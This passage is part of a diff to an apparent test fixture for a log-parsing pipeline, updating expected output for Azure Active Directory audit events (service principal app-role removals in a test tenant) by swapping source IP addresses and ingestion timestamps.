removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", "kind": "event", 
@@ -1387,25 +1261,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -1419,7 +1275,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -1555,7 +1411,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -1567,12 +1423,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036107500Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.
0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124866Z", + "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name
\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464425\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservi
ce\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"7f09b681-251f-4ff0-97cf-5247891b6981\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Remove app role assignment from service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management 
APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}",
 "code": "AzureActiveDirectory",
 "provider": "AzureActiveDirectory",
 "kind": "event",
@@ -1598,25 +1454,7 @@
 },
 {
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "as": {
- "number": 3352,
- "organization": {
- "name": "Telefonica De Espana"
- }
- },
- "ip": "83.57.233.151"
+ "ip": "67.43.156.15"
 },
 "tags": [
 "preserve_original_event"
@@ -1630,7 +1468,7 @@
 "ObjectId": "c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com",
 "ResultStatus": "Success",
 "UserKey": "1003200096971F55@testsiem.onmicrosoft.com",
- "ActorIpAddress": "83.57.233.151",
+ "ActorIpAddress": "67.43.156.15",
 "ExtendedProperties": {
 "actorObjectClass": "User",
 "teamName": "MSODS.",
@@ -1766,7 +1604,7 @@
 "asr"
 ],
 "ip": [
- "83.57.233.151"
+ "67.43.156.15"
 ]
 },
 "organization": {
@@ -1778,12 +1616,12 @@ "id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd" }, "client": { - "address": "83.57.233.151", - "ip": "83.57.233.151" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "event": { - "ingested": "2021-06-17T07:32:38.036113100Z", - "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"83.57.233.151\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"83.57.233.151\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
"Value\":\"R5\"}],\"Id\":\"d8a2ae24-a752-4f8e-adca-c57189a76a71\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"5c242833-909c-4c6b-bca3-50feaaa98d23\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"71a0194b-b70c-44a6-82f2-d4670aee4585\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add a deletion-marked app role assignment grant to service principal as part of link removal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", + "ingested": "2021-12-09T13:41:51.124872700Z", + "original": 
"{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-09T15:34:06\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management 
APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"ac045271-8d7f-49b2-abc9-5130051d879f\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"5c242833-909c-4c6b-bca3-50feaaa98d23\\\",\\\"DisplayName\\\":\\\"siem\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\",\\\"Name\\\":\\\"71a0194b-b70c-44a6-82f2-d4670aee4585\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-09T15:34:06.3062012Z\"},{\"Name\":\"env_epoch\",\"Value\":\"31CXC\"},{\"Name\":\"env_seqNum\",\"Value\":\"38464434\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##2b06f483-d288-458d-b40b-af7ad69a2407_00000000-0000-0000-0000-000000000000_2b06f483-d288-458d-b40b-af7ad69a2407\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR556\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\
